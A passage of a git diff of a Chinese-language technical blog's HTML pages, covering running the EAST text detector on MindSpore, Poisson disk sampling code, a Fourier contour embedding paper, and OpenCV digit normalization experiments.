      # 对于每一张图片,调用detect()函数进行目标检测,返回目标框的坐标信息
      print('evaluating {} image'.format(i), end='\r')
      boxes = detect(Image.open(img_file), model)
      seq = []
      if boxes is not None:
      # 如果检测结果不为空,则将框的坐标信息转换成符合要求的字符串序列并加入到列表seq中
      seq.extend([','.join([str(int(b))
      for b in box[:-1]]) + '\n' for box in boxes])
      # 将序列seq保存为与当前图片名称相同的.txt文件格式,并将其写入submit_path目录下
      with open(os.path.join(submit_path, 'res_' +
      os.path.basename(img_file).replace('.jpg', '.txt')), 'w') as f:
      f.writelines(seq) # 当检测完成后,输出log信息提示检测进度
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      def detect_dataset(model, test_img_path, submit_path):
      """
      detection on whole dataset, save .txt results in submit_path
      Input:
      model : detection model 模型实例
      device : gpu if gpu is available
      test_img_path: dataset path 测试图片所在文件夹的路径
      submit_path : submit result for evaluation 提交结果保存路径
      """
      # 读取测试集中所有的图片,并按照文件名排序
      img_files = os.listdir(test_img_path)
      img_files = sorted([os.path.join(test_img_path, img_file)
      for img_file in img_files])

      for i, img_file in enumerate(img_files):
      # 对于每一张图片,调用detect()函数进行目标检测,返回目标框的坐标信息
      print('evaluating {} image'.format(i), end='\r')
      boxes = detect(Image.open(img_file), model)
      seq = []
      if boxes is not None:
      # 如果检测结果不为空,则将框的坐标信息转换成符合要求的字符串序列并加入到列表seq中
      seq.extend([','.join([str(int(b))
      for b in box[:-1]]) + '\n' for box in boxes])
      # 将序列seq保存为与当前图片名称相同的.txt文件格式,并将其写入submit_path目录下
      with open(os.path.join(submit_path, 'res_' +
      os.path.basename(img_file).replace('.jpg', '.txt')), 'w') as f:
      f.writelines(seq) # 当检测完成后,输出log信息提示检测进度

      detect()
      -
      def detect(img, model):
      """detect text regions of img using model
      Input:
      img : PIL Image
      model : detection model
      device: gpu if gpu is available
      Output:
      detected polys
      """
      # 将输入图片进行尺寸调整与相应的 ratio 变换,得到调整后的图片、高宽比例 ratio_h 和 ratio_w
      img, ratio_h, ratio_w = resize_img(img)
      # 利用模型对调整后的图片进行文字区域检测,得到概率图 score 和文本框参数 geo
      score, geo = model(load_pil(img))
      # 对概率图和文本框参数使用 PaddlePaddle 中的 Squeeze()函数进行维度降低(由 4 维转为 3 维)
      score = P.Squeeze(0)(score)
      geo = P.Squeeze(0)(geo)
      # 从降维后的概率图和文本框参数中获取文本框坐标信息,即调用 get_boxes()函数
      boxes = get_boxes(score.asnumpy(), geo.asnumpy())
      # 根据之前的高宽比例 ratio_h 和 ratio_w,调整并计算出检测到的文本框在原始图片上的坐标信息,即调用 adjust_ratio()函数
      return adjust_ratio(boxes, ratio_w, ratio_h)
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      def detect(img, model):
      """detect text regions of img using model
      Input:
      img : PIL Image
      model : detection model
      device: gpu if gpu is available
      Output:
      detected polys
      """
      # 将输入图片进行尺寸调整与相应的 ratio 变换,得到调整后的图片、高宽比例 ratio_h 和 ratio_w
      img, ratio_h, ratio_w = resize_img(img)
      # 利用模型对调整后的图片进行文字区域检测,得到概率图 score 和文本框参数 geo
      score, geo = model(load_pil(img))
      # 对概率图和文本框参数使用 PaddlePaddle 中的 Squeeze()函数进行维度降低(由 4 维转为 3 维)
      score = P.Squeeze(0)(score)
      geo = P.Squeeze(0)(geo)
      # 从降维后的概率图和文本框参数中获取文本框坐标信息,即调用 get_boxes()函数
      boxes = get_boxes(score.asnumpy(), geo.asnumpy())
      # 根据之前的高宽比例 ratio_h 和 ratio_w,调整并计算出检测到的文本框在原始图片上的坐标信息,即调用 adjust_ratio()函数
      return adjust_ratio(boxes, ratio_w, ratio_h)

      get_boxes()
      -
      def get_boxes(score, geo, score_thresh=0.9, nms_thresh=0.2):
      """get boxes from feature map
      Input:
      score : score map from model <numpy.ndarray, (1,row,col)> 概率图
      geo : geo map from model <numpy.ndarray, (5,row,col)> 文本框参数
      score_thresh: threshold to segment score map 置信度阈值
      nms_thresh : threshold in nms 非极大值抑制阈值
      Output:
      boxes : final polys <numpy.ndarray, (n,9)>
      """
      # 对输入的score进行降维,即将其转化为二维数组
      score = score[0, :, :]
      # 在降维后的score数组中,找到大于score_thresh的点,并以(r,c)的格式记录下来,形成一个n x 2的矩阵xy_text
      xy_text = np.argwhere(score > score_thresh) # n x 2, format is [r, c]
      # 按行排序xy_text,以保证前面的点在结果中优先考虑
      if xy_text.size == 0:
      return None

      # 将xy_text中的坐标信息转化为正确的x,y坐标(由于降维之前是按行major的顺序排列,因此需要将列号作为x坐标,行号作为y坐标)
      xy_text = xy_text[np.argsort(xy_text[:, 0])]
      valid_pos = xy_text[:, ::-1].copy() # n x 2, [x, y]
      # 从降维后的geo数组中提取出与xy_text中相应位置点相关的文本框参数,形成5 x n的矩阵valid_geo
      valid_geo = geo[:, xy_text[:, 0], xy_text[:, 1]] # 5 x n
      # 利用restore_polys()函数将valid_pos和valid_geo还原为文本框的坐标点集polys_restored,并得到对应的索引值index
      polys_restored, index = restore_polys(valid_pos, valid_geo, score.shape)
      if polys_restored.size == 0:
      return None

      # 将polys_restored表示为(n,8)大小的数组,其中前8列分别为文本框像素点的坐标,第9列为该文本框的置信度(即所在score map中的值)
      boxes = np.zeros((polys_restored.shape[0], 9), dtype=np.float32)
      boxes[:, :8] = polys_restored
      boxes[:, 8] = score[xy_text[index, 0], xy_text[index, 1]]
      # 对polys_restored执行非极大值抑制(NMS)操作,得到最终的文本框坐标信息boxes
      boxes = lanms.merge_quadrangle_n9(boxes.astype('float32'), nms_thresh)
      return boxes
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      def get_boxes(score, geo, score_thresh=0.9, nms_thresh=0.2):
      """get boxes from feature map
      Input:
      score : score map from model <numpy.ndarray, (1,row,col)> 概率图
      geo : geo map from model <numpy.ndarray, (5,row,col)> 文本框参数
      score_thresh: threshold to segment score map 置信度阈值
      nms_thresh : threshold in nms 非极大值抑制阈值
      Output:
      boxes : final polys <numpy.ndarray, (n,9)>
      """
      # 对输入的score进行降维,即将其转化为二维数组
      score = score[0, :, :]
      # 在降维后的score数组中,找到大于score_thresh的点,并以(r,c)的格式记录下来,形成一个n x 2的矩阵xy_text
      xy_text = np.argwhere(score > score_thresh) # n x 2, format is [r, c]
      # 按行排序xy_text,以保证前面的点在结果中优先考虑
      if xy_text.size == 0:
      return None

      # 将xy_text中的坐标信息转化为正确的x,y坐标(由于降维之前是按行major的顺序排列,因此需要将列号作为x坐标,行号作为y坐标)
      xy_text = xy_text[np.argsort(xy_text[:, 0])]
      valid_pos = xy_text[:, ::-1].copy() # n x 2, [x, y]
      # 从降维后的geo数组中提取出与xy_text中相应位置点相关的文本框参数,形成5 x n的矩阵valid_geo
      valid_geo = geo[:, xy_text[:, 0], xy_text[:, 1]] # 5 x n
      # 利用restore_polys()函数将valid_pos和valid_geo还原为文本框的坐标点集polys_restored,并得到对应的索引值index
      polys_restored, index = restore_polys(valid_pos, valid_geo, score.shape)
      if polys_restored.size == 0:
      return None

      # 将polys_restored表示为(n,8)大小的数组,其中前8列分别为文本框像素点的坐标,第9列为该文本框的置信度(即所在score map中的值)
      boxes = np.zeros((polys_restored.shape[0], 9), dtype=np.float32)
      boxes[:, :8] = polys_restored
      boxes[:, 8] = score[xy_text[index, 0], xy_text[index, 1]]
      # 对polys_restored执行非极大值抑制(NMS)操作,得到最终的文本框坐标信息boxes
      boxes = lanms.merge_quadrangle_n9(boxes.astype('float32'), nms_thresh)
      return boxes

      adjust_ratio()

      根据之前的高宽比例 ratio_h 和 ratio_w,调整并计算出检测到的文本框在原始图片上的坐标信息

      -
      def adjust_ratio(boxes, ratio_w, ratio_h):
      """refine boxes
      Input:
      boxes : detected polys <numpy.ndarray, (n,9)>
      ratio_w: ratio of width
      ratio_h: ratio of height
      Output:
      refined boxes
      """
      if boxes is None or boxes.size == 0:
      return None
      boxes[:, [0, 2, 4, 6]] /= ratio_w
      boxes[:, [1, 3, 5, 7]] /= ratio_h
      return np.around(boxes)
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      def adjust_ratio(boxes, ratio_w, ratio_h):
      """refine boxes
      Input:
      boxes : detected polys <numpy.ndarray, (n,9)>
      ratio_w: ratio of width
      ratio_h: ratio of height
      Output:
      refined boxes
      """
      if boxes is None or boxes.size == 0:
      return None
      boxes[:, [0, 2, 4, 6]] /= ratio_w
      boxes[:, [1, 3, 5, 7]] /= ratio_h
      return np.around(boxes)

      跑!

      1. 变更一个 mindspore 2.0 的镜像,太旧的 mindspore 会寄……
      2. @@ -1174,19 +1172,19 @@

        跑!

      In this project, the file organization is recommended as below:

      -
      .
      └─data
      ├─icdar2015
      ├─Training # Training set
      ├─image # Images in training set
      ├─groundTruth # GT in training set
      └─Test # Test set
      ├─image # Images in training set
      ├─groundTruth # GT in training set
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      .
      └─data
      ├─icdar2015
      ├─Training # Training set
      ├─image # Images in training set
      ├─groundTruth # GT in training set
      └─Test # Test set
      ├─image # Images in training set
      ├─groundTruth # GT in training set

      png

      1. 安装环境一条龙!requirements.txt 里面的玩意着实难装,还是手动装好了……
      -
      source activate base  # 第一次进服务器激活需要 activate base
      python -c "import mindspore;mindspore.run_check()" # 查看 mindspore 版本
      conda create -n east --clone base # 克隆 base 环境
      conda activate east # 激活 east 环境
      pip install numpy
      pip install opencv-python
      pip install shapely
      pip install pillow
      pip install lanms-neo
      pip install --upgrade setuptools # 更新 setuptools
      pip install Polygon3 # 这个库很难装,可能需要更新 setuptools
      pip install onnxruntime
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      source activate base  # 第一次进服务器激活需要 activate base
      python -c "import mindspore;mindspore.run_check()" # 查看 mindspore 版本
      conda create -n east --clone base # 克隆 base 环境
      conda activate east # 激活 east 环境
      pip install numpy
      pip install opencv-python
      pip install shapely
      pip install pillow
      pip install lanms-neo
      pip install --upgrade setuptools # 更新 setuptools
      pip install Polygon3 # 这个库很难装,可能需要更新 setuptools
      pip install onnxruntime

      ​ 装好环境后可以保存一下镜像,这样下次重开服务器的时候就会保留之前安装好的环境:

      png

      1. 切到仓库目录,开跑 train.py
      -
      cd /home/ma-user/work/east/
      python3 train.py
      +
      1
      2
      cd /home/ma-user/work/east/
      python3 train.py

      png

      ​ 显示完超参数后,就开始 train 了,继续等呗。

      png

      @@ -1215,11 +1213,11 @@

      跑!

      开跑 eval.py

      -
      python3 eval.py
      +
      1
      python3 eval.py

      ​ 然后就能在 submit\ 里查看评估结果,和 ground truth 参考一下,能识别一点点东西。

      png

      ​ 返回出来的效果比它宣传的要差好多啊,呜呜呜……

      -
      Calculated!{"precision": 0.527431421446384, "recall": 0.6109773712084737, "hmean": 0.566138746375195, "AP": 0}
      +
      1
      Calculated!{"precision": 0.527431421446384, "recall": 0.6109773712084737, "hmean": 0.566138746375195, "AP": 0}
      @@ -1437,6 +1435,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Fast Poisson Disk Sampling in Arbitrary Dimensions/index.html b/posts/Paper-Fast Poisson Disk Sampling in Arbitrary Dimensions/index.html index 81537d2c0b..8c3d083e50 100644 --- a/posts/Paper-Fast Poisson Disk Sampling in Arbitrary Dimensions/index.html +++ b/posts/Paper-Fast Poisson Disk Sampling in Arbitrary Dimensions/index.html @@ -44,8 +44,6 @@ - - @@ -425,7 +423,7 @@

      2 The Algorithm

      3 Analysis

      Step2 执行 $2N−1$ 次,产生 $N$ 个样本:每次迭代要么产生一个新样本并将其添加到活动列表中,要么从活动列表中删除一个现有样本。Step2 的每次迭代花费 $O(k)$ 时间,并且由于 $k$ 保持恒定(通常非常小),因此算法是线性的。

      代码

      -
      import numpy as np
      import matplotlib.pyplot as plt

      r = 1 # 样本间的最小距离
      d = r / np.sqrt(2) # 单元格大小
      k = 30 # 算法中拒绝之前要选择的样本的极限
      width = 20 # 样本域宽
      height = 16 # 样本域高

      # 将网格实现为一个简单的二维数组
      nx = int(width / d) + 1
      ny = int(height / d) + 1
      occupied = np.zeros((ny, nx)) # 用于记录网格是否被占用
      occupied_coord = np.zeros((ny, nx, 2)) # 记录每个被占用网格对应的坐标
      active_list = [] # 待处理点集
      sampled = [] # 已经采样的点集

      # 定义了一个相对坐标矩阵 relative,它包含了一个中心点和其周围 18 个格点的相对坐标。
      relative = np.array([[-1, 2], [0, 2], [1, 2],
      [-2, 1], [-1, 1], [0, 1], [1, 1], [2, 1],
      [-2, 0], [-1, 0], [1, 0], [2, 0],
      [-2, -1], [-1, -1], [0, -1], [1, -1], [2, -1],
      [-1, -2], [0, -2], [1, -2]])
      np.random.seed(0)
      # 使用 numpy.random.rand 函数生成一个随机的初始点,并将其添加到相应的数组中
      x, y = np.random.rand() * width, np.random.rand() * height
      idx_x, idx_y = int(x / d), int(y / d)
      occupied[idx_y, idx_x] = 1
      occupied_coord[idx_y, idx_x] = (x, y)
      active_list.append((x, y))
      sampled.append((x, y))

      sampled_idx = 0

      while len(active_list) > 0: # 当活动列表不为空时
      idx = np.random.choice(np.arange(len(active_list))) # 选择一个随机索引, 比如 i
      # 生成从 x_i 周围半径 r 和 2r 之间的球面环中均匀选择的多达 k 个点
      ref_x, ref_y = active_list[idx]
      radius = (np.random.rand(k) + 1) * r
      theta = np.random.rand(k) * np.pi * 2
      candidate = radius * np.cos(theta) + ref_x, radius * np.sin(theta) + ref_y
      flag_out = False
      for _x, _y in zip(*candidate):
      # 依次检查每个点是否在现有样本的距离 r 内
      if _x < 0 or _x > width or _y < 0 or _y > height:
      continue
      # other geo constraints
      flag = True
      idx_x, idx_y = int(_x / d), int(_y / d)
      if occupied[idx_y, idx_x] != 0:
      continue
      else:
      neighbours = relative + np.array([idx_x, idx_y])
      for cand_x, cand_y in neighbours:
      # 检查其坐标是否超出画布范围。如果超出,则跳过该点
      if cand_x < 0 or cand_x >= nx or cand_y < 0 or cand_y >= ny:
      continue
      if occupied[cand_y, cand_x] == 1:
      # 找到该网格对应的点
      cood = occupied_coord[cand_y, cand_x]
      # 计算该网格对应的点与候选点之间的距离,如果小于最小半径 r,则说明候选点不满足几何约束条件,需要舍弃
      if (_x - cood[0]) ** 2 + (_y - cood[1]) ** 2 < r ** 2:
      flag = False
      break
      if flag: # 将该点标记为已占据,并添加到已采样点集和活动列表中。
      flag_out = True
      occupied[idx_y, idx_x] = 1
      occupied_coord[idx_y, idx_x] = (_x, _y)
      sampled.append((_x, _y))
      active_list.append((_x, _y))
      sampled_idx += 1
      break
      if not flag_out: # 如果在 k 次尝试之后没有找到这样的点,则将 i 从活动列表中删除
      active_list.pop(idx)

      fig, ax = plt.subplots(1, 1, figsize=(9, 6))
      fig.set_tight_layout(True)
      ax.scatter(*zip(*sampled), c='g')
      ax.set_xlim([0, width])
      ax.set_ylim([0, height])
      plt.show()
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      52
      53
      54
      55
      56
      57
      58
      59
      60
      61
      62
      63
      64
      65
      66
      67
      68
      69
      70
      71
      72
      73
      74
      75
      76
      77
      78
      79
      80
      81
      import numpy as np
      import matplotlib.pyplot as plt

      r = 1 # 样本间的最小距离
      d = r / np.sqrt(2) # 单元格大小
      k = 30 # 算法中拒绝之前要选择的样本的极限
      width = 20 # 样本域宽
      height = 16 # 样本域高

      # 将网格实现为一个简单的二维数组
      nx = int(width / d) + 1
      ny = int(height / d) + 1
      occupied = np.zeros((ny, nx)) # 用于记录网格是否被占用
      occupied_coord = np.zeros((ny, nx, 2)) # 记录每个被占用网格对应的坐标
      active_list = [] # 待处理点集
      sampled = [] # 已经采样的点集

      # 定义了一个相对坐标矩阵 relative,它包含了一个中心点和其周围 18 个格点的相对坐标。
      relative = np.array([[-1, 2], [0, 2], [1, 2],
      [-2, 1], [-1, 1], [0, 1], [1, 1], [2, 1],
      [-2, 0], [-1, 0], [1, 0], [2, 0],
      [-2, -1], [-1, -1], [0, -1], [1, -1], [2, -1],
      [-1, -2], [0, -2], [1, -2]])
      np.random.seed(0)
      # 使用 numpy.random.rand 函数生成一个随机的初始点,并将其添加到相应的数组中
      x, y = np.random.rand() * width, np.random.rand() * height
      idx_x, idx_y = int(x / d), int(y / d)
      occupied[idx_y, idx_x] = 1
      occupied_coord[idx_y, idx_x] = (x, y)
      active_list.append((x, y))
      sampled.append((x, y))

      sampled_idx = 0

      while len(active_list) > 0: # 当活动列表不为空时
      idx = np.random.choice(np.arange(len(active_list))) # 选择一个随机索引, 比如 i
      # 生成从 x_i 周围半径 r 和 2r 之间的球面环中均匀选择的多达 k 个点
      ref_x, ref_y = active_list[idx]
      radius = (np.random.rand(k) + 1) * r
      theta = np.random.rand(k) * np.pi * 2
      candidate = radius * np.cos(theta) + ref_x, radius * np.sin(theta) + ref_y
      flag_out = False
      for _x, _y in zip(*candidate):
      # 依次检查每个点是否在现有样本的距离 r 内
      if _x < 0 or _x > width or _y < 0 or _y > height:
      continue
      # other geo constraints
      flag = True
      idx_x, idx_y = int(_x / d), int(_y / d)
      if occupied[idx_y, idx_x] != 0:
      continue
      else:
      neighbours = relative + np.array([idx_x, idx_y])
      for cand_x, cand_y in neighbours:
      # 检查其坐标是否超出画布范围。如果超出,则跳过该点
      if cand_x < 0 or cand_x >= nx or cand_y < 0 or cand_y >= ny:
      continue
      if occupied[cand_y, cand_x] == 1:
      # 找到该网格对应的点
      cood = occupied_coord[cand_y, cand_x]
      # 计算该网格对应的点与候选点之间的距离,如果小于最小半径 r,则说明候选点不满足几何约束条件,需要舍弃
      if (_x - cood[0]) ** 2 + (_y - cood[1]) ** 2 < r ** 2:
      flag = False
      break
      if flag: # 将该点标记为已占据,并添加到已采样点集和活动列表中。
      flag_out = True
      occupied[idx_y, idx_x] = 1
      occupied_coord[idx_y, idx_x] = (_x, _y)
      sampled.append((_x, _y))
      active_list.append((_x, _y))
      sampled_idx += 1
      break
      if not flag_out: # 如果在 k 次尝试之后没有找到这样的点,则将 i 从活动列表中删除
      active_list.pop(idx)

      fig, ax = plt.subplots(1, 1, figsize=(9, 6))
      fig.set_tight_layout(True)
      ax.scatter(*zip(*sampled), c='g')
      ax.set_xlim([0, width])
      ax.set_ylim([0, height])
      plt.show()
      @@ -643,6 +641,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Fourier Contour Embedding for Arbitrary-Shaped Text Detection/index.html b/posts/Paper-Fourier Contour Embedding for Arbitrary-Shaped Text Detection/index.html index 9bb2a4e38b..bb7d54001d 100644 --- a/posts/Paper-Fourier Contour Embedding for Arbitrary-Shaped Text Detection/index.html +++ b/posts/Paper-Fourier Contour Embedding for Arbitrary-Shaped Text Detection/index.html @@ -44,8 +44,6 @@ - - @@ -412,7 +410,7 @@

      资源

      CVPR: CVPR 2021 Open Access Repository (thecvf.com)

    -
    @inproceedings{zhu2021fourier,
    title={Fourier contour embedding for arbitrary-shaped text detection},
    author={Zhu, Yiqin and Chen, Jianyong and Liang, Lingyu and Kuang, Zhanghui and Jin, Lianwen and Zhang, Wayne},
    booktitle={Proceedings of the IEEE/CVF conference on computer vision and pattern recognition},
    pages={3123--3131},
    year={2021}
    }
    +
    1
    2
    3
    4
    5
    6
    7
    @inproceedings{zhu2021fourier,
    title={Fourier contour embedding for arbitrary-shaped text detection},
    author={Zhu, Yiqin and Chen, Jianyong and Liang, Lingyu and Kuang, Zhanghui and Jin, Lianwen and Zhang, Wayne},
    booktitle={Proceedings of the IEEE/CVF conference on computer vision and pattern recognition},
    pages={3123--3131},
    year={2021}
    }

    正文

    Abstract

    ​ 对于 arbitrary-shaped text detection,现有方法大都通过笛卡尔坐标系或极坐标系中的掩模或轮廓点序列来对图像空间域中的文本实例进行建模。点序列表示可能对具有高度弯曲形状的文本建模的能力有限。

    @@ -722,6 +720,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Handwritten Optical Character Recognition (OCR)-A Comprehensive Systematic Literature Review (SLR)/index.html b/posts/Paper-Handwritten Optical Character Recognition (OCR)-A Comprehensive Systematic Literature Review (SLR)/index.html index faa72d5168..d5860af941 100644 --- a/posts/Paper-Handwritten Optical Character Recognition (OCR)-A Comprehensive Systematic Literature Review (SLR)/index.html +++ b/posts/Paper-Handwritten Optical Character Recognition (OCR)-A Comprehensive Systematic Literature Review (SLR)/index.html @@ -44,8 +44,6 @@ - - @@ -1179,6 +1177,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Handwritten digit recognition-investigation of normalization and feature extraction techniques/index.html b/posts/Paper-Handwritten digit recognition-investigation of normalization and feature extraction techniques/index.html index 7002107d66..f18b589390 100644 --- a/posts/Paper-Handwritten digit recognition-investigation of normalization and feature extraction techniques/index.html +++ b/posts/Paper-Handwritten digit recognition-investigation of normalization and feature extraction techniques/index.html @@ -44,8 +44,6 @@ - - @@ -821,12 +819,12 @@

    ​ 对于基于矩的归一化($F7$,$F8$ 和 $F9$),归一化图像在中心点居中,标准平面的任何维度都不被填充。


    ​ 使用 Python 尝试代码复现 $F0$ - $F5$:

    -
    import cv2
    import numpy as np
    import matplotlib.pyplot as plt

    img = cv2.imread('9.png', 0)
    -
    img.shape
    +
    1
    2
    3
    4
    5
    import cv2
    import numpy as np
    import matplotlib.pyplot as plt

    img = cv2.imread('9.png', 0)
    +
    1
    img.shape
    (76, 35)
     
    -
    H2 = 35
    W2 = 35


    def R1(img):
    if img.shape[0] < img.shape[1]:
    return img.shape[0] / img.shape[1]
    else:
    return img.shape[1] / img.shape[0]


    def F0(img):
    ans = cv2.resize(img, (H2, W2))
    return ans


    def F1(img):
    if img.shape[0] < img.shape[1]:
    ans = cv2.resize(img, (H2, round(W2 * R1(img))))
    else:
    ans = cv2.resize(img, (round(H2 * R1(img)), W2))
    ans = cv2.copyMakeBorder(ans,
    round((H2-ans.shape[0]) / 2), (H2-ans.shape[0]) // 2,
    (W2-ans.shape[1]) // 2, round((W2-ans.shape[1]) / 2),
    cv2.BORDER_CONSTANT,value=(255, 255, 255))
    return ans


    def F2(img):
    if img.shape[0] < img.shape[1]:
    ans = cv2.resize(img, (H2, round(W2 * R1(img) ** 0.5)))
    else:
    ans = cv2.resize(img, (round(H2 * R1(img) ** 0.5), W2))
    ans = cv2.copyMakeBorder(ans,
    round((H2 - ans.shape[0]) / 2), (H2 - ans.shape[0]) // 2,
    (W2 - ans.shape[1]) // 2, round((W2 - ans.shape[1]) / 2),
    cv2.BORDER_CONSTANT, value=(255, 255, 255))
    return ans


    def F3(img):
    if img.shape[0] < img.shape[1]:
    ans = cv2.resize(img, (H2, round(W2 * R1(img) ** (1 / 3))))
    else:
    ans = cv2.resize(img, (round(H2 * R1(img) ** (1 / 3)), W2))
    ans = cv2.copyMakeBorder(ans,
    round((H2-ans.shape[0]) / 2), (H2-ans.shape[0]) // 2,
    (W2-ans.shape[1]) // 2, round((W2-ans.shape[1]) / 2),
    cv2.BORDER_CONSTANT,value=(255, 255, 255))
    return ans


    def F4(img):
    if R1(img) >= 0.5:
    return F0(img)
    if img.shape[0] < img.shape[1]:
    ans = cv2.resize(img, (H2, round(W2 * (R1(img) * 1.5 + 0.25))))
    else:
    ans = cv2.resize(img, (round(H2 * (R1(img) * 1.5 + 0.25)), W2))
    ans = cv2.copyMakeBorder(ans,
    round((H2-ans.shape[0]) / 2), (H2-ans.shape[0]) // 2,
    (W2-ans.shape[1]) // 2, round((W2-ans.shape[1]) / 2),
    cv2.BORDER_CONSTANT,value=(255, 255, 255))
    return ans


    def F5(img):
    if img.shape[0] < img.shape[1]:
    ans = cv2.resize(img, (H2, round(W2 * (sin(R1(img) * np.pi / 2)) ** 0.5)))
    else:
    ans = cv2.resize(img, (round(H2 * (np.sin(R1(img) * np.pi / 2)) ** 0.5), W2))
    ans = cv2.copyMakeBorder(ans,
    round((H2-ans.shape[0]) / 2), (H2-ans.shape[0]) // 2,
    (W2-ans.shape[1]) // 2, round((W2-ans.shape[1]) / 2),
    cv2.BORDER_CONSTANT,value=(255, 255, 255))
    return ans
    -
    fig = plt.figure(figsize=(9, 3))

    ax = fig.add_subplot(1, 6, 1)
    plt.xticks([])
    plt.yticks([])
    ax.imshow(img, cmap='gray')
    ax.title.set_text('Original')
    for i in range(6):
    if i < 5:
    p = i + 2
    else:
    p = i + 3
    exec("ax" + str(i) + "=fig.add_subplot(2, 6, " + str(p) + ")")
    plt.xticks([])
    plt.yticks([])
    exec("ax" + str(i) + ".imshow(F" + str(i) + "(img), cmap='gray')")
    exec("ax" + str(i) + ".title.set_text('F" + str(i) + "')")
    plt.show()
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    H2 = 35
    W2 = 35


    def R1(img):
    if img.shape[0] < img.shape[1]:
    return img.shape[0] / img.shape[1]
    else:
    return img.shape[1] / img.shape[0]


    def F0(img):
    ans = cv2.resize(img, (H2, W2))
    return ans


    def F1(img):
    if img.shape[0] < img.shape[1]:
    ans = cv2.resize(img, (H2, round(W2 * R1(img))))
    else:
    ans = cv2.resize(img, (round(H2 * R1(img)), W2))
    ans = cv2.copyMakeBorder(ans,
    round((H2-ans.shape[0]) / 2), (H2-ans.shape[0]) // 2,
    (W2-ans.shape[1]) // 2, round((W2-ans.shape[1]) / 2),
    cv2.BORDER_CONSTANT,value=(255, 255, 255))
    return ans


    def F2(img):
    if img.shape[0] < img.shape[1]:
    ans = cv2.resize(img, (H2, round(W2 * R1(img) ** 0.5)))
    else:
    ans = cv2.resize(img, (round(H2 * R1(img) ** 0.5), W2))
    ans = cv2.copyMakeBorder(ans,
    round((H2 - ans.shape[0]) / 2), (H2 - ans.shape[0]) // 2,
    (W2 - ans.shape[1]) // 2, round((W2 - ans.shape[1]) / 2),
    cv2.BORDER_CONSTANT, value=(255, 255, 255))
    return ans


    def F3(img):
    if img.shape[0] < img.shape[1]:
    ans = cv2.resize(img, (H2, round(W2 * R1(img) ** (1 / 3))))
    else:
    ans = cv2.resize(img, (round(H2 * R1(img) ** (1 / 3)), W2))
    ans = cv2.copyMakeBorder(ans,
    round((H2-ans.shape[0]) / 2), (H2-ans.shape[0]) // 2,
    (W2-ans.shape[1]) // 2, round((W2-ans.shape[1]) / 2),
    cv2.BORDER_CONSTANT,value=(255, 255, 255))
    return ans


    def F4(img):
    if R1(img) >= 0.5:
    return F0(img)
    if img.shape[0] < img.shape[1]:
    ans = cv2.resize(img, (H2, round(W2 * (R1(img) * 1.5 + 0.25))))
    else:
    ans = cv2.resize(img, (round(H2 * (R1(img) * 1.5 + 0.25)), W2))
    ans = cv2.copyMakeBorder(ans,
    round((H2-ans.shape[0]) / 2), (H2-ans.shape[0]) // 2,
    (W2-ans.shape[1]) // 2, round((W2-ans.shape[1]) / 2),
    cv2.BORDER_CONSTANT,value=(255, 255, 255))
    return ans


    def F5(img):
    if img.shape[0] < img.shape[1]:
    ans = cv2.resize(img, (H2, round(W2 * (sin(R1(img) * np.pi / 2)) ** 0.5)))
    else:
    ans = cv2.resize(img, (round(H2 * (np.sin(R1(img) * np.pi / 2)) ** 0.5), W2))
    ans = cv2.copyMakeBorder(ans,
    round((H2-ans.shape[0]) / 2), (H2-ans.shape[0]) // 2,
    (W2-ans.shape[1]) // 2, round((W2-ans.shape[1]) / 2),
    cv2.BORDER_CONSTANT,value=(255, 255, 255))
    return ans
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    fig = plt.figure(figsize=(9, 3))

    ax = fig.add_subplot(1, 6, 1)
    plt.xticks([])
    plt.yticks([])
    ax.imshow(img, cmap='gray')
    ax.title.set_text('Original')
    for i in range(6):
    if i < 5:
    p = i + 2
    else:
    p = i + 3
    exec("ax" + str(i) + "=fig.add_subplot(2, 6, " + str(p) + ")")
    plt.xticks([])
    plt.yticks([])
    exec("ax" + str(i) + ".imshow(F" + str(i) + "(img), cmap='gray')")
    exec("ax" + str(i) + ".title.set_text('F" + str(i) + "')")
    plt.show()

    png

    3 Feature extraction techniques 特征提取技术

      @@ -873,7 +871,7 @@

      img_f = cv2.GaussianBlur(img, (7, 7), -1)

      fig = plt.figure(figsize=(4, 4))
      ax = fig.add_subplot(1, 2, 1)
      plt.xticks([])
      plt.yticks([])
      ax.imshow(img, cmap='gray')
      ax.title.set_text('Original')

      ax_f = fig.add_subplot(1, 2, 2)
      plt.xticks([])
      plt.yticks([])
      ax_f.imshow(img_f, cmap='gray')
      ax_f.title.set_text('GaussianBlur')

      plt.show()
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      img_f = cv2.GaussianBlur(img, (7, 7), -1)

      fig = plt.figure(figsize=(4, 4))
